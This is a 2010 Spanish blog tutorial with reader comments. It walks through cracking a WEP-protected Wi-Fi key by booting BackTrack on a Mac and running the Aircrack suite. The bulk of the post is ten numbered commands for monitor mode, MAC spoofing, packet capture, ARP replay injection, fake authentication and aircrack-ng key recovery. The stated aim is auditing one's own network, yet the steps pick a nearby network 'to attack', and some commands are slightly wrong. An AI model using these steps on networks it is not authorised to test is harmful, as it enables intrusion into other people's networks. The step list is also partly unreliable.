domingo, 9 de mayo de 2010

Desencriptar redes Wi-Fi en Mac.



Para poder desencriptar una red inálambrica , desde nuestro Mac , es relativamente sencillo si tienes unos conocimientos medios a nivel de usuario , este procedimiento nos puede servir para comprobar la seguridad de nuestra red inálambrica con seguridad WEP , se puede hacer en WPA , pero hoy vamos a empezar con la WEP , WPA2 aún no está disponible.

Nota: No me hago responsable si desencriptan cualquier red inálambrica de cualquier persona (Menos tu propia red) para poder conseguir internet gratis.

Me voy a extender bastante , dadle al seguir leyendo...



Primero , necesitamos descargarnos la distribución Linux BackTrack , es una distribución dedicada a la seguridad  y a estudios forenses , usaremos esta y no otra porque incluye de serie toda la suite Aircrack , os dejo el link de BackTrack a continuación:



Ok , ya con la imagen de BackTrack en formato .iso , nos toca grabarla en un DVD , en un CD no podrá ser posible , ya que la imagen .iso de BackTrack pesa más de 1GB.

Desde la Utilidad de Discos de Mac OS X  , se puede grabar directamente , con el botón que está encima que parece que si le pulsas , puedes repetir un nuevo Chernovil (Sí , es ese botón con pinta de central nuclear) , y en cuestión de 5 min tendrás grabado BackTrack en 
vuestro DVD.


Siguiendo todos estos pasos , introducimos el DVD en el Mac , y reiniciamos el ordenador , antes de que salte la manzanita , pulsamos la tecla C.


Esperamos a que carge , y cuando parezca que ya no salen más líneas de código escribimos: startx
Ahora empezará a cargar la interfaz , servicios de red , etc.. y nos mostrará el escritorio.
Ok , nos vamos a la Terminal
El resto se trata de escribir código y esperar...


Empezemos:
  1. Escribimos: iwconfig para averiguar el nombre de la placa Wi-Fi , será eth1 , eth0 , wlan 1, wlan0 etc...
  2. Escribimos: airmon-ng start (nombre de nuesta placa Wi-Fi) para apagar el Wi-Fi.
  3. Escribimos: macchanger -m 11:22:33:44:55 (nombre de nuestra placa Wi-Fi) Esto nos sirve para saber nuesta dirección MAC , que luego usaremos.
  4. Escribimos: airmon-ng start (nombre de nuestra placa Wi-Fi) para activar el Wi-Fi.
  5. Escribimos: airodump-ng (nombre de nuestra placa Wi-Fi) para escanear redes Wi-Fi cercanas a nosotros , cuando seleccionemos la red que queramos atacar , pulsamos: Control +C , no cerrad esta ventana , nos da datos que tendremos que usar más adelante.
  6. Abrimos otra ventana del terminal sin cerrar la anterior y escribimos: airodump-ng --channel 11 --write pass "nombre placa Wi-Fi"  Aclaración: Channel es el canal en la que la red Wi-Fi que queramos atacar , opera , normalmente es el canal 11 , pero puede ser cualquier otro , cuidado con los espacios.
  7. Abrimos otra ventana del terminal sin cerrar la anterior y escribimos: aireplay-ng -3 -b (MAC de la red Wi-Fi a atacar) -h (Nuestra MAC) (nombre de nuestra placa Wi-Fi).
  8. Abrimos otra ventana del terminal sin cerrar la anterior y escribimos: aireplay-ng -1 0 -e (nombre de la red a atacar) -a (MAC de la red a atacar) -h (Nuestra Mac) (nombre de nuestra placa Wi-Fi) Recalco que lo estoy escribiendo al pie de la letra , y hay que respetar estrictamente los espacios.
  9. Esperar a que los paquetes ARP del paso 8 , tengan un valor de al menos 50.000 paquetes.
  10. Abrimos otra ventana del terminal sin cerrar la anterior y escribimos: aircrack-ng pass-01.cap
Ok , si todo funciona , en cuestión de segundos , el programa nos facilitará la clave de la red Wi-Fi.

Si ocurre algún error , puede ser que tengaís un Mac con una tarjeta airport no compatible seguramente porque ya estará vieja , o a la inversa , que sea demasiado nueva , en ese caso , recomiendo usar un adaptador inálambrico por USB , que seguro que lo reconocerá , ah , y esto es válido en cualquier ordenador , he puesto como titulo "Tutorial: Desencriptar redes Wi-Fi con tu Mac" para aquellos que no sepan hacer los primeros pasos , los de grabar imagen y arrancar desde el DVD...

    6 Limosnas en forma de comentario:

    Anónimo dijo...

    Esto no se podia tanbien hacer en Ubuntu?

    Kike dijo...

    Si , concretamente instalando la suite aircrack , con el comando sudo aptitude install aircrack-mg

    Gracias por comentar!

    adonisk2 dijo...

    MEe enseñarias como hacerlo en mi casa o la tuya?

    Anónimo dijo...

    Holaaaa!! estoy intentando hacer una prueba y estoy intentando arrancar el so mediante vmware, y no me reconoce la tarjeta airport. Sabes si se puede hacer asi o es necesario utilizar el cd. GRACIAS

    Anónimo dijo...

    joder!! llevo muchos años con ordenadores y yo no tengo cojones de hacer esto tio!! esto es para jakers

    emilMdOS dijo...

    Es lo mismo que se hace en cualquier ditro linux con Aircrack, no tiene nada que ver con Mac.. Por otra parte, el airport de mac no es compatible para auditorias, al meter el comando "iwconfig" aparecera que nuestra inalambrica no es compatible para auditoria y no podremos pasar de ese paso..

    Publicar un comentario

    Una limosna en forma de comentario!